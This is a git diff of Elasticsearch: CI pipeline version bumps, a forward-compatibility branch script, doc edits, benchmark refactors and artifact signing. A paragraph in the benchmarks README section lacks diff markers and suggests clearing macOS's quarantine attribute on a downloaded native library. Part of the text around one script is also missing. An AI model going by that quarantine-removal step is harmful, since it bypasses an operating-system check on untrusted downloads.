8.17.9 / packaging-tests-upgrade" - command: ./.ci/scripts/packaging-test.sh -Dbwc.checkout.align=true destructiveDistroUpgradeTest.v8.17.9 + - label: "{{matrix.image}} / 8.17.10 / packaging-tests-upgrade" + command: ./.ci/scripts/packaging-test.sh -Dbwc.checkout.align=true destructiveDistroUpgradeTest.v8.17.10 
timeout_in_minutes: 300 matrix: setup: @@ -316,10 +316,10 @@ steps: machineType: custom-16-32768 buildDirectory: /dev/shm/bk env: - BWC_VERSION: 8.17.9 + BWC_VERSION: 8.17.10 - - label: "{{matrix.image}} / 8.18.4 / packaging-tests-upgrade" - command: ./.ci/scripts/packaging-test.sh -Dbwc.checkout.align=true destructiveDistroUpgradeTest.v8.18.4 + - label: "{{matrix.image}} / 8.18.7 / packaging-tests-upgrade" + command: ./.ci/scripts/packaging-test.sh -Dbwc.checkout.align=true destructiveDistroUpgradeTest.v8.18.7 timeout_in_minutes: 300 matrix: setup: @@ -332,10 +332,10 @@ steps: machineType: custom-16-32768 buildDirectory: /dev/shm/bk env: - BWC_VERSION: 8.18.4 + BWC_VERSION: 8.18.7 - - label: "{{matrix.image}} / 8.19.0 / packaging-tests-upgrade" - command: ./.ci/scripts/packaging-test.sh -Dbwc.checkout.align=true destructiveDistroUpgradeTest.v8.19.0 + - label: "{{matrix.image}} / 8.19.4 / packaging-tests-upgrade" + command: ./.ci/scripts/packaging-test.sh -Dbwc.checkout.align=true destructiveDistroUpgradeTest.v8.19.4 timeout_in_minutes: 300 matrix: setup: @@ -348,10 +348,10 @@ steps: machineType: custom-16-32768 buildDirectory: /dev/shm/bk env: - BWC_VERSION: 8.19.0 + BWC_VERSION: 8.19.4 - - label: "{{matrix.image}} / 9.0.4 / packaging-tests-upgrade" - command: ./.ci/scripts/packaging-test.sh -Dbwc.checkout.align=true destructiveDistroUpgradeTest.v9.0.4 + - label: "{{matrix.image}} / 9.0.7 / packaging-tests-upgrade" + command: ./.ci/scripts/packaging-test.sh -Dbwc.checkout.align=true destructiveDistroUpgradeTest.v9.0.7 timeout_in_minutes: 300 matrix: setup: @@ -364,10 +364,10 @@ steps: machineType: custom-16-32768 buildDirectory: /dev/shm/bk env: - BWC_VERSION: 9.0.4 + BWC_VERSION: 9.0.7 - - label: "{{matrix.image}} / 9.1.0 / packaging-tests-upgrade" - command: ./.ci/scripts/packaging-test.sh -Dbwc.checkout.align=true destructiveDistroUpgradeTest.v9.1.0 + - label: "{{matrix.image}} / 9.1.4 / packaging-tests-upgrade" + command: ./.ci/scripts/packaging-test.sh -Dbwc.checkout.align=true destructiveDistroUpgradeTest.v9.1.4 timeout_in_minutes: 300 matrix: setup: @@ -380,7 +380,7 @@ steps: machineType: custom-16-32768 buildDirectory: /dev/shm/bk env: - BWC_VERSION: 9.1.0 + BWC_VERSION: 9.1.4 - group: packaging-tests-windows steps: diff --git a/.buildkite/pipelines/periodic.template.yml b/.buildkite/pipelines/periodic.template.yml index 2ed6528f710c1..9a79ab80cce07 100644 --- a/.buildkite/pipelines/periodic.template.yml +++ b/.buildkite/pipelines/periodic.template.yml @@ -204,6 +204,17 @@ steps: image: family/elasticsearch-ubuntu-2404 machineType: n2-standard-8 buildDirectory: /dev/shm/bk + - label: third-party / ms-graph + command: | + .ci/scripts/run-gradle.sh msGraphThirdPartyTest + env: + USE_3RD_PARTY_MS_GRAPH_CREDENTIALS: "true" + timeout_in_minutes: 30 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n2-standard-8 + buildDirectory: /dev/shm/bk - group: lucene-compat steps: - label: "{{matrix.LUCENE_VERSION}} / lucene-compat" @@ -235,7 +246,7 @@ steps: image: family/elasticsearch-ubuntu-2404 machineType: n2-standard-8 buildDirectory: /dev/shm/bk - if: build.branch == "main" || build.branch == "8.19" || build.branch == "7.17" + if: build.branch =~ /^(main|\d+\.\d+|\d+\.x)$$/ - label: check-branch-consistency command: .ci/scripts/run-gradle.sh branchConsistency timeout_in_minutes: 15 diff --git a/.buildkite/pipelines/periodic.yml b/.buildkite/pipelines/periodic.yml index 5c6af6ba91a55..ff21d546e871b 100644 --- a/.buildkite/pipelines/periodic.yml +++ 
b/.buildkite/pipelines/periodic.yml @@ -325,8 +325,8 @@ steps: - signal_reason: agent_stop limit: 3 - - label: 8.17.9 / bwc - command: .ci/scripts/run-gradle.sh -Dbwc.checkout.align=true v8.17.9#bwcTest + - label: 8.17.10 / bwc + command: .ci/scripts/run-gradle.sh -Dbwc.checkout.align=true v8.17.10#bwcTest timeout_in_minutes: 300 agents: provider: gcp @@ -335,7 +335,7 @@ steps: buildDirectory: /dev/shm/bk preemptible: true env: - BWC_VERSION: 8.17.9 + BWC_VERSION: 8.17.10 retry: automatic: - exit_status: "-1" @@ -344,8 +344,8 @@ steps: - signal_reason: agent_stop limit: 3 - - label: 8.18.4 / bwc - command: .ci/scripts/run-gradle.sh -Dbwc.checkout.align=true v8.18.4#bwcTest + - label: 8.18.7 / bwc + command: .ci/scripts/run-gradle.sh -Dbwc.checkout.align=true v8.18.7#bwcTest timeout_in_minutes: 300 agents: provider: gcp @@ -354,7 +354,7 @@ steps: buildDirectory: /dev/shm/bk preemptible: true env: - BWC_VERSION: 8.18.4 + BWC_VERSION: 8.18.7 retry: automatic: - exit_status: "-1" @@ -363,8 +363,8 @@ steps: - signal_reason: agent_stop limit: 3 - - label: 8.19.0 / bwc - command: .ci/scripts/run-gradle.sh -Dbwc.checkout.align=true v8.19.0#bwcTest + - label: 8.19.4 / bwc + command: .ci/scripts/run-gradle.sh -Dbwc.checkout.align=true v8.19.4#bwcTest timeout_in_minutes: 300 agents: provider: gcp @@ -373,7 +373,7 @@ steps: buildDirectory: /dev/shm/bk preemptible: true env: - BWC_VERSION: 8.19.0 + BWC_VERSION: 8.19.4 retry: automatic: - exit_status: "-1" @@ -382,8 +382,8 @@ steps: - signal_reason: agent_stop limit: 3 - - label: 9.0.4 / bwc - command: .ci/scripts/run-gradle.sh -Dbwc.checkout.align=true v9.0.4#bwcTest + - label: 9.0.7 / bwc + command: .ci/scripts/run-gradle.sh -Dbwc.checkout.align=true v9.0.7#bwcTest timeout_in_minutes: 300 agents: provider: gcp @@ -392,7 +392,7 @@ steps: buildDirectory: /dev/shm/bk preemptible: true env: - BWC_VERSION: 9.0.4 + BWC_VERSION: 9.0.7 retry: automatic: - exit_status: "-1" @@ -401,8 +401,8 @@ steps: - signal_reason: agent_stop limit: 3 - - label: 9.1.0 / bwc - command: .ci/scripts/run-gradle.sh -Dbwc.checkout.align=true v9.1.0#bwcTest + - label: 9.1.4 / bwc + command: .ci/scripts/run-gradle.sh -Dbwc.checkout.align=true v9.1.4#bwcTest timeout_in_minutes: 300 agents: provider: gcp @@ -411,7 +411,7 @@ steps: buildDirectory: /dev/shm/bk preemptible: true env: - BWC_VERSION: 9.1.0 + BWC_VERSION: 9.1.4 retry: automatic: - exit_status: "-1" @@ -487,7 +487,7 @@ steps: setup: ES_RUNTIME_JAVA: - openjdk21 - BWC_VERSION: ["8.17.9", "8.18.4", "8.19.0", "9.0.4", "9.1.0"] + BWC_VERSION: ["8.18.7", "8.19.4", "9.0.7", "9.1.4"] agents: provider: gcp image: family/elasticsearch-ubuntu-2404 @@ -531,7 +531,7 @@ steps: ES_RUNTIME_JAVA: - openjdk21 - openjdk23 - BWC_VERSION: ["8.17.9", "8.18.4", "8.19.0", "9.0.4", "9.1.0"] + BWC_VERSION: ["8.18.7", "8.19.4", "9.0.7", "9.1.4"] agents: provider: gcp image: family/elasticsearch-ubuntu-2404 @@ -623,6 +623,17 @@ steps: image: family/elasticsearch-ubuntu-2404 machineType: n2-standard-8 buildDirectory: /dev/shm/bk + - label: third-party / ms-graph + command: | + .ci/scripts/run-gradle.sh msGraphThirdPartyTest + env: + USE_3RD_PARTY_MS_GRAPH_CREDENTIALS: "true" + timeout_in_minutes: 30 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n2-standard-8 + buildDirectory: /dev/shm/bk - group: lucene-compat steps: - label: "{{matrix.LUCENE_VERSION}} / lucene-compat" @@ -654,7 +665,7 @@ steps: image: family/elasticsearch-ubuntu-2404 machineType: n2-standard-8 buildDirectory: /dev/shm/bk - if: build.branch == 
"main" || build.branch == "8.19" || build.branch == "7.17" + if: build.branch =~ /^(main|\d+\.\d+|\d+\.x)$$/ - label: check-branch-consistency command: .ci/scripts/run-gradle.sh branchConsistency timeout_in_minutes: 15 diff --git a/.buildkite/scripts/fwc-branches.sh b/.buildkite/scripts/fwc-branches.sh new file mode 100644 index 0000000000000..2bf0ff470dce7 --- /dev/null +++ b/.buildkite/scripts/fwc-branches.sh @@ -0,0 +1,24 @@ +#!/bin/bash + +# Configure FwC test branches +# We do not want 7.x branch and only to run for branches that: +# - have released at least one minor version (not main) +# - have previous minor unreleased (not the oldest development branch) +FWC_BRANCHES=() +for branch in "${BRANCHES[@]}"; do + if [[ ! "$branch" =~ ^7\..* ]]; then + FWC_BRANCHES+=("$branch") + fi +done +# Remove first and last element +FWC_BRANCHES=("${FWC_BRANCHES[@]:1:${#FWC_BRANCHES[@]}-2}") + +shouldRunFwcFor() { + local branch=$1 + for fwc_branch in "${FWC_BRANCHES[@]}"; do + if [[ "$fwc_branch" == "$branch" ]]; then + return 0 + fi + done + return 1 +} diff --git a/.buildkite/scripts/periodic.trigger.sh b/.buildkite/scripts/periodic.trigger.sh index 30e13386f3088..a987de8939084 100755 --- a/.buildkite/scripts/periodic.trigger.sh +++ b/.buildkite/scripts/periodic.trigger.sh @@ -5,6 +5,7 @@ set -euo pipefail echo "steps:" source .buildkite/scripts/branches.sh +source .buildkite/scripts/fwc-branches.sh IS_FIRST=true SKIP_DELAY="${SKIP_DELAY:-false}" @@ -46,8 +47,7 @@ EOF branch: "$BRANCH" commit: "$LAST_GOOD_COMMIT" EOF -# Include forward compatibility tests only for the bugfix branch -if [[ "${BRANCH}" == "${BRANCHES[2]}" ]]; then +if shouldRunFwcFor "$BRANCH"; then cat < [!Tip] +> [!Tip] > A manual confirmation of the Gradle generated checksums is currently not mandatory. > If you want to add a level of verification you can manually confirm the checksum (e.g. by looking it up on the website of the library) > Please replace the content of the `origin` attribute by `official site` in that case. @@ -186,6 +186,25 @@ dependencies { To test an unreleased development version of a third party dependency you have several options. +### How do I test against java pre-release versions like early access (ea) or release candidates (rc)? + +Currently only openjdk EA builds by oracle are supported. +To test against an early access version java version you can pass the major +java version appended with `-pre` as a system property (e.g. -Druntime.java=26-pre) to the Gradle build: + +``` +./gradlew clean test -Druntime.java=26-pre +``` + +This will run the tests using the JDK 26 pre-release version and pick the latest available build of the matching JDK EA version we expose +in our custom jdk catalogue at `https://builds.es-jdk-archive.com/jdks/openjdk/recent.json`. + +To run against a specific build number of the EA build you can pass a second system property (e.g. `-Druntime.java.build=6`): + +``` +./gradlew clean test -Druntime.java=26-pre -Druntime.java.build=6 +``` + #### How to use a Maven based third party dependency via `mavenlocal`? 1. Clone the third party repository locally @@ -229,7 +248,7 @@ In addition to snapshot builds JitPack supports building Pull Requests. Simply u 3. Run the Gradle build as needed. Keep in mind the initial resolution might take a bit longer as this needs to be built by JitPack in the background before we can resolve the adhoc built dependency. 
-> [!Note] +> [!Note] > You should only use that approach locally or on a developer branch for production dependencies as we do not want to ship unreleased libraries into our releases. @@ -261,7 +280,7 @@ allprojects { ``` 4. Run the Gradle build as needed with `--write-verification-metadata` to ensure the Gradle dependency verification does not fail on your custom dependency. -> [!Note] +> [!Note] > As Gradle prefers to use modules whose descriptor has been created from real meta-data rather than being generated, flat directory repositories cannot be used to override artifacts with real meta-data from other repositories declared in the build. > For example, if Gradle finds only `jmxri-1.2.1.jar` in a flat directory repository, but `jmxri-1.2.1.pom` in another repository diff --git a/README.asciidoc b/README.asciidoc index 7efdb64e5bb19..2dbf6d1f287ac 100644 --- a/README.asciidoc +++ b/README.asciidoc @@ -275,7 +275,7 @@ For the complete Elasticsearch documentation visit https://www.elastic.co/guide/en/elasticsearch/reference/current/index.html[elastic.co]. For information about our documentation processes, see the -xref:docs/README.asciidoc[docs README]. +xref:https://github.com/elastic/elasticsearch/blob/main/docs/README.md[docs README]. [[examples]] == Examples and guides diff --git a/benchmarks/README.md b/benchmarks/README.md index af72d16d2ad4b..c5b8f5b9d2321 100644 --- a/benchmarks/README.md +++ b/benchmarks/README.md @@ -152,11 +152,10 @@ exit Grab the async profiler from https://github.com/jvm-profiling-tools/async-profiler and run `prof async` like so: ``` -gradlew -p benchmarks/ run --args 'LongKeyedBucketOrdsBenchmark.multiBucket -prof "async:libPath=/home/nik9000/Downloads/async-profiler-3.0-29ee888-linux-x64/lib/libasyncProfiler.so;dir=/tmp/prof;output=flamegraph"' +gradlew -p benchmarks/ run --args 'LongKeyedBucketOrdsBenchmark.multiBucket -prof "async:libPath=/home/nik9000/Downloads/async-profiler-4.0-linux-x64/lib/libasyncProfiler.so;dir=/tmp/prof;output=flamegraph"' ``` -Note: As of January 2025 the latest release of async profiler doesn't work - with our JDK but the nightly is fine. +Note: As of July 2025 the 4.0 release of the async profiler works well. If you are on Mac, this'll warn you that you downloaded the shared library from the internet. You'll need to go to settings and allow it to run. 
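If you would rather skip the System Settings round-trip, one alternative is to clear macOS's quarantine attribute before running; a sketch assuming a hypothetical extraction path, so adjust it to wherever you unpacked the profiler:

```
# Recursively drop the quarantine flag so the profiler's shared library loads without prompting.
xattr -r -d com.apple.quarantine ~/Downloads/async-profiler-4.0-macos
```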
diff --git a/benchmarks/src/main/java/org/elasticsearch/benchmark/_nightly/esql/QueryPlanningBenchmark.java b/benchmarks/src/main/java/org/elasticsearch/benchmark/_nightly/esql/QueryPlanningBenchmark.java index d2811962dd29d..3b4d445002073 100644 --- a/benchmarks/src/main/java/org/elasticsearch/benchmark/_nightly/esql/QueryPlanningBenchmark.java +++ b/benchmarks/src/main/java/org/elasticsearch/benchmark/_nightly/esql/QueryPlanningBenchmark.java @@ -70,11 +70,11 @@ public class QueryPlanningBenchmark { private EsqlParser defaultParser; private Analyzer manyFieldsAnalyzer; private LogicalPlanOptimizer defaultOptimizer; + private Configuration config; @Setup public void setup() { - - var config = new Configuration( + this.config = new Configuration( DateUtils.UTC, Locale.US, null, @@ -116,7 +116,7 @@ public void setup() { } private LogicalPlan plan(EsqlParser parser, Analyzer analyzer, LogicalPlanOptimizer optimizer, String query) { - var parsed = parser.createStatement(query, new QueryParams(), telemetry); + var parsed = parser.createStatement(query, new QueryParams(), telemetry, config); var analyzed = analyzer.analyze(parsed); var optimized = optimizer.optimize(analyzed); return optimized; diff --git a/benchmarks/src/main/java/org/elasticsearch/benchmark/compute/operator/ValuesSourceReaderBenchmark.java b/benchmarks/src/main/java/org/elasticsearch/benchmark/_nightly/esql/ValuesSourceReaderBenchmark.java similarity index 95% rename from benchmarks/src/main/java/org/elasticsearch/benchmark/compute/operator/ValuesSourceReaderBenchmark.java rename to benchmarks/src/main/java/org/elasticsearch/benchmark/_nightly/esql/ValuesSourceReaderBenchmark.java index a4504bedb3644..c41357c426fb0 100644 --- a/benchmarks/src/main/java/org/elasticsearch/benchmark/compute/operator/ValuesSourceReaderBenchmark.java +++ b/benchmarks/src/main/java/org/elasticsearch/benchmark/_nightly/esql/ValuesSourceReaderBenchmark.java @@ -7,7 +7,7 @@ * License v3.0 only", or the "Server Side Public License, v 1". 
*/ -package org.elasticsearch.benchmark.compute.operator; +package org.elasticsearch.benchmark._nightly.esql; import org.apache.lucene.document.FieldType; import org.apache.lucene.document.NumericDocValuesField; @@ -24,8 +24,10 @@ import org.apache.lucene.util.BytesRef; import org.apache.lucene.util.NumericUtils; import org.elasticsearch.common.breaker.NoopCircuitBreaker; +import org.elasticsearch.common.logging.LogConfigurator; import org.elasticsearch.common.lucene.Lucene; import org.elasticsearch.common.settings.Settings; +import org.elasticsearch.common.unit.ByteSizeValue; import org.elasticsearch.common.util.BigArrays; import org.elasticsearch.compute.data.BlockFactory; import org.elasticsearch.compute.data.BytesRefBlock; @@ -41,7 +43,8 @@ import org.elasticsearch.compute.data.Page; import org.elasticsearch.compute.lucene.LuceneSourceOperator; import org.elasticsearch.compute.lucene.ShardRefCounted; -import org.elasticsearch.compute.lucene.ValuesSourceReaderOperator; +import org.elasticsearch.compute.lucene.read.ValuesSourceReaderOperator; +import org.elasticsearch.compute.lucene.read.ValuesSourceReaderOperatorStatus; import org.elasticsearch.compute.operator.topn.TopNOperator; import org.elasticsearch.core.IOUtils; import org.elasticsearch.index.IndexSettings; @@ -84,10 +87,22 @@ @State(Scope.Thread) @Fork(1) public class ValuesSourceReaderBenchmark { + static { + LogConfigurator.configureESLogging(); + } + + private static final String[] SUPPORTED_LAYOUTS = new String[] { "in_order", "shuffled", "shuffled_singles" }; + private static final String[] SUPPORTED_NAMES = new String[] { + "long", + "int", + "double", + "keyword", + "stored_keyword", + "3_stored_keywords" }; + private static final int BLOCK_LENGTH = 16 * 1024; private static final int INDEX_SIZE = 10 * BLOCK_LENGTH; private static final int COMMIT_INTERVAL = 500; - private static final BigArrays BIG_ARRAYS = BigArrays.NON_RECYCLING_INSTANCE; private static final BlockFactory blockFactory = BlockFactory.getInstance( new NoopCircuitBreaker("noop"), BigArrays.NON_RECYCLING_INSTANCE @@ -103,8 +118,8 @@ static void selfTest() { ValuesSourceReaderBenchmark benchmark = new ValuesSourceReaderBenchmark(); benchmark.setupIndex(); try { - for (String layout : ValuesSourceReaderBenchmark.class.getField("layout").getAnnotationsByType(Param.class)[0].value()) { - for (String name : ValuesSourceReaderBenchmark.class.getField("name").getAnnotationsByType(Param.class)[0].value()) { + for (String layout : ValuesSourceReaderBenchmark.SUPPORTED_LAYOUTS) { + for (String name : ValuesSourceReaderBenchmark.SUPPORTED_NAMES) { benchmark.layout = layout; benchmark.name = name; try { @@ -118,7 +133,7 @@ static void selfTest() { } finally { benchmark.teardownIndex(); } - } catch (IOException | NoSuchFieldException e) { + } catch (IOException e) { throw new AssertionError(e); } } @@ -320,10 +335,10 @@ public FieldNamesFieldMapper.FieldNamesFieldType fieldNames() { * each page has a single document rather than {@code BLOCK_SIZE} docs. 
* */ - @Param({ "in_order", "shuffled", "shuffled_singles" }) + @Param({ "in_order", "shuffled" }) public String layout; - @Param({ "long", "int", "double", "keyword", "stored_keyword", "3_stored_keywords" }) + @Param({ "long", "keyword", "stored_keyword" }) public String name; private Directory directory; @@ -335,6 +350,7 @@ public FieldNamesFieldMapper.FieldNamesFieldType fieldNames() { public void benchmark() { ValuesSourceReaderOperator op = new ValuesSourceReaderOperator( blockFactory, + ByteSizeValue.ofMb(1).getBytes(), fields(name), List.of(new ValuesSourceReaderOperator.ShardContext(reader, () -> { throw new UnsupportedOperationException("can't load _source here"); @@ -343,7 +359,7 @@ public void benchmark() { ); long sum = 0; for (Page page : pages) { - op.addInput(page); + op.addInput(page.shallowCopy()); switch (name) { case "long" -> { LongVector values = op.getOutput().getBlock(1).asVector(); @@ -411,7 +427,7 @@ public void benchmark() { throw new AssertionError("[" + layout + "][" + name + "] expected [" + expected + "] but was [" + sum + "]"); } boolean foundStoredFieldLoader = false; - ValuesSourceReaderOperator.Status status = (ValuesSourceReaderOperator.Status) op.status(); + ValuesSourceReaderOperatorStatus status = (ValuesSourceReaderOperatorStatus) op.status(); for (Map.Entry e : status.readersBuilt().entrySet()) { if (e.getKey().indexOf("stored_fields") >= 0) { foundStoredFieldLoader = true; diff --git a/benchmarks/src/main/java/org/elasticsearch/benchmark/compute/operator/AggregatorBenchmark.java b/benchmarks/src/main/java/org/elasticsearch/benchmark/compute/operator/AggregatorBenchmark.java index d144d7601349d..cb4f898ab1dee 100644 --- a/benchmarks/src/main/java/org/elasticsearch/benchmark/compute/operator/AggregatorBenchmark.java +++ b/benchmarks/src/main/java/org/elasticsearch/benchmark/compute/operator/AggregatorBenchmark.java @@ -666,6 +666,11 @@ public Block eval(Page page) { return mask; } + @Override + public long baseRamBytesUsed() { + return 0; + } + @Override public void close() { mask.close(); diff --git a/benchmarks/src/main/java/org/elasticsearch/benchmark/compute/operator/EvalBenchmark.java b/benchmarks/src/main/java/org/elasticsearch/benchmark/compute/operator/EvalBenchmark.java index 5bd003fe4271f..034ccc58f6b61 100644 --- a/benchmarks/src/main/java/org/elasticsearch/benchmark/compute/operator/EvalBenchmark.java +++ b/benchmarks/src/main/java/org/elasticsearch/benchmark/compute/operator/EvalBenchmark.java @@ -144,7 +144,7 @@ static void selfTest() { public String operation; private static Operator operator(String operation) { - return new EvalOperator(driverContext.blockFactory(), evaluator(operation)); + return new EvalOperator(driverContext, evaluator(operation)); } private static EvalOperator.ExpressionEvaluator evaluator(String operation) { diff --git a/benchmarks/src/main/java/org/elasticsearch/benchmark/compute/operator/ValuesAggregatorBenchmark.java b/benchmarks/src/main/java/org/elasticsearch/benchmark/compute/operator/ValuesAggregatorBenchmark.java index 238540bf2c799..879418e7f954c 100644 --- a/benchmarks/src/main/java/org/elasticsearch/benchmark/compute/operator/ValuesAggregatorBenchmark.java +++ b/benchmarks/src/main/java/org/elasticsearch/benchmark/compute/operator/ValuesAggregatorBenchmark.java @@ -95,7 +95,8 @@ static void selfTest() { try { for (String groups : ValuesAggregatorBenchmark.class.getField("groups").getAnnotationsByType(Param.class)[0].value()) { for (String dataType : 
ValuesAggregatorBenchmark.class.getField("dataType").getAnnotationsByType(Param.class)[0].value()) { - run(Integer.parseInt(groups), dataType, 10); + run(Integer.parseInt(groups), dataType, 10, 0); + run(Integer.parseInt(groups), dataType, 10, 1); } } } catch (NoSuchFieldException e) { @@ -113,7 +114,10 @@ static void selfTest() { @Param({ BYTES_REF, INT, LONG }) public String dataType; - private static Operator operator(DriverContext driverContext, int groups, String dataType) { + @Param({ "0", "1" }) + public int numOrdinalMerges; + + private static Operator operator(DriverContext driverContext, int groups, String dataType, int numOrdinalMerges) { if (groups == 1) { return new AggregationOperator( List.of(supplier(dataType).aggregatorFactory(AggregatorMode.SINGLE, List.of(0)).apply(driverContext)), @@ -125,7 +129,24 @@ private static Operator operator(DriverContext driverContext, int groups, String List.of(supplier(dataType).groupingAggregatorFactory(AggregatorMode.SINGLE, List.of(1))), () -> BlockHash.build(groupSpec, driverContext.blockFactory(), 16 * 1024, false), driverContext - ); + ) { + @Override + public Page getOutput() { + mergeOrdinal(); + return super.getOutput(); + } + + // simulate OrdinalsGroupingOperator + void mergeOrdinal() { + var merged = supplier(dataType).groupingAggregatorFactory(AggregatorMode.SINGLE, List.of(1)).apply(driverContext); + for (int i = 0; i < numOrdinalMerges; i++) { + for (int p = 0; p < groups; p++) { + merged.addIntermediateRow(p, aggregators.getFirst(), p); + } + } + aggregators.set(0, merged); + } + }; } private static AggregatorFunctionSupplier supplier(String dataType) { @@ -331,12 +352,12 @@ private static Block groupingBlock(int groups) { @Benchmark public void run() { - run(groups, dataType, OP_COUNT); + run(groups, dataType, OP_COUNT, numOrdinalMerges); } - private static void run(int groups, String dataType, int opCount) { + private static void run(int groups, String dataType, int opCount, int numOrdinalMerges) { DriverContext driverContext = driverContext(); - try (Operator operator = operator(driverContext, groups, dataType)) { + try (Operator operator = operator(driverContext, groups, dataType, numOrdinalMerges)) { Page page = page(groups, dataType); for (int i = 0; i < opCount; i++) { operator.addInput(page.shallowCopy()); diff --git a/benchmarks/src/main/java/org/elasticsearch/benchmark/xcontent/JsonParserBenchmark.java b/benchmarks/src/main/java/org/elasticsearch/benchmark/xcontent/JsonParserBenchmark.java new file mode 100644 index 0000000000000..a49f01f81c34f --- /dev/null +++ b/benchmarks/src/main/java/org/elasticsearch/benchmark/xcontent/JsonParserBenchmark.java @@ -0,0 +1,87 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". 
+ */ + +package org.elasticsearch.benchmark.xcontent; + +import org.elasticsearch.common.bytes.BytesReference; +import org.elasticsearch.common.io.Streams; +import org.elasticsearch.xcontent.XContentParser; +import org.elasticsearch.xcontent.XContentParserConfiguration; +import org.elasticsearch.xcontent.XContentType; +import org.openjdk.jmh.annotations.Benchmark; +import org.openjdk.jmh.annotations.BenchmarkMode; +import org.openjdk.jmh.annotations.Fork; +import org.openjdk.jmh.annotations.Level; +import org.openjdk.jmh.annotations.Measurement; +import org.openjdk.jmh.annotations.Mode; +import org.openjdk.jmh.annotations.OutputTimeUnit; +import org.openjdk.jmh.annotations.Scope; +import org.openjdk.jmh.annotations.Setup; +import org.openjdk.jmh.annotations.State; +import org.openjdk.jmh.annotations.Warmup; +import org.openjdk.jmh.infra.Blackhole; + +import java.io.IOException; +import java.util.Arrays; +import java.util.Collections; +import java.util.List; +import java.util.Map; +import java.util.Random; +import java.util.concurrent.TimeUnit; +import java.util.stream.Collectors; + +@Fork(1) +@Warmup(iterations = 5) +@Measurement(iterations = 10) +@BenchmarkMode(Mode.AverageTime) +@OutputTimeUnit(TimeUnit.NANOSECONDS) +@State(Scope.Thread) +public class JsonParserBenchmark { + private Map<String, BytesReference> sourceBytes; + private BytesReference source; + private Random random; + private List<String> sourcesRandomized; + + final String[] sources = new String[] { "monitor_cluster_stats.json", "monitor_index_stats.json", "monitor_node_stats.json" }; + + @Setup(Level.Iteration) + public void randomizeSource() { + sourcesRandomized = Arrays.asList(sources); + Collections.shuffle(sourcesRandomized, random); + } + + @Setup(Level.Trial) + public void setup() throws IOException { + random = new Random(); + sourceBytes = Arrays.stream(sources).collect(Collectors.toMap(s -> s, s -> { + try { + return readSource(s); + } catch (IOException e) { + throw new RuntimeException(e); + } + })); + } + + @Benchmark + public void parseJson(Blackhole bh) throws IOException { + sourcesRandomized.forEach(source -> { + try { + final XContentParser parser = XContentType.JSON.xContent() + .createParser(XContentParserConfiguration.EMPTY, sourceBytes.get(source).streamInput()); + bh.consume(parser.mapOrdered()); + } catch (IOException e) { + throw new RuntimeException(e); + } + }); + } + + private BytesReference readSource(String fileName) throws IOException { + return Streams.readFully(JsonParserBenchmark.class.getResourceAsStream(fileName)); + } +} diff --git a/benchmarks/src/test/java/org/elasticsearch/benchmark/compute/operator/ValuesSourceReaderBenchmarkTests.java b/benchmarks/src/test/java/org/elasticsearch/benchmark/_nightly/esql/ValuesSourceReaderBenchmarkTests.java similarity index 92% rename from benchmarks/src/test/java/org/elasticsearch/benchmark/compute/operator/ValuesSourceReaderBenchmarkTests.java rename to benchmarks/src/test/java/org/elasticsearch/benchmark/_nightly/esql/ValuesSourceReaderBenchmarkTests.java index 7d72455f9fb22..e1d2b8f43100c 100644 --- a/benchmarks/src/test/java/org/elasticsearch/benchmark/compute/operator/ValuesSourceReaderBenchmarkTests.java +++ b/benchmarks/src/test/java/org/elasticsearch/benchmark/_nightly/esql/ValuesSourceReaderBenchmarkTests.java @@ -7,7 +7,7 @@ * License v3.0 only", or the "Server Side Public License, v 1".
*/ -package org.elasticsearch.benchmark.compute.operator; +package org.elasticsearch.benchmark._nightly.esql; import org.elasticsearch.test.ESTestCase; diff --git a/branches.json b/branches.json deleted file mode 100644 index a2feaf0715575..0000000000000 --- a/branches.json +++ /dev/null @@ -1,26 +0,0 @@ -{ - "notice": "This file is not maintained outside of the main branch and should only be used for tooling.", - "branches": [ - { - "branch": "main" - }, - { - "branch": "9.1" - }, - { - "branch": "9.0" - }, - { - "branch": "8.19" - }, - { - "branch": "8.18" - }, - { - "branch": "8.17" - }, - { - "branch": "7.17" - } - ] -} diff --git a/build-conventions/src/main/java/org/elasticsearch/gradle/internal/conventions/PublishPlugin.java b/build-conventions/src/main/java/org/elasticsearch/gradle/internal/conventions/PublishPlugin.java index d3f03b9534be3..1b5dad2f3a3ec 100644 --- a/build-conventions/src/main/java/org/elasticsearch/gradle/internal/conventions/PublishPlugin.java +++ b/build-conventions/src/main/java/org/elasticsearch/gradle/internal/conventions/PublishPlugin.java @@ -10,12 +10,10 @@ package org.elasticsearch.gradle.internal.conventions; import groovy.util.Node; +import nmcp.NmcpPlugin; -import com.github.jengelman.gradle.plugins.shadow.ShadowExtension; import com.github.jengelman.gradle.plugins.shadow.ShadowPlugin; -import nmcp.NmcpPlugin; - import org.elasticsearch.gradle.internal.conventions.info.GitInfo; import org.elasticsearch.gradle.internal.conventions.precommit.PomValidationPrecommitPlugin; import org.elasticsearch.gradle.internal.conventions.util.Util; @@ -41,6 +39,8 @@ import org.gradle.api.tasks.bundling.Jar; import org.gradle.initialization.layout.BuildLayout; import org.gradle.language.base.plugins.LifecycleBasePlugin; +import org.gradle.plugins.signing.SigningExtension; +import org.gradle.plugins.signing.SigningPlugin; import org.w3c.dom.Element; import java.io.File; @@ -69,6 +69,7 @@ public void apply(Project project) { project.getPluginManager().apply(PomValidationPrecommitPlugin.class); project.getPluginManager().apply(LicensingPlugin.class); project.getPluginManager().apply(NmcpPlugin.class); + project.getPluginManager().apply(SigningPlugin.class); configureJavadocJar(project); configureSourcesJar(project); configurePomGeneration(project); @@ -79,6 +80,13 @@ public void apply(Project project) { private void configurePublications(Project project) { var publishingExtension = project.getExtensions().getByType(PublishingExtension.class); var publication = publishingExtension.getPublications().create("elastic", MavenPublication.class); + Provider<String> signingKey = project.getProviders().gradleProperty("signingKey"); + if (signingKey.isPresent()) { + SigningExtension signing = project.getExtensions().getByType(SigningExtension.class); + signing.useInMemoryPgpKeys(signingKey.get(), project.getProviders().gradleProperty("signingPassword").get()); + signing.sign(publication); + } + project.afterEvaluate(project1 -> { if (project1.getPlugins().hasPlugin(ShadowPlugin.class)) { configureWithShadowPlugin(project1, publication); @@ -164,8 +172,9 @@ private void addNameAndDescriptionToPom(Project 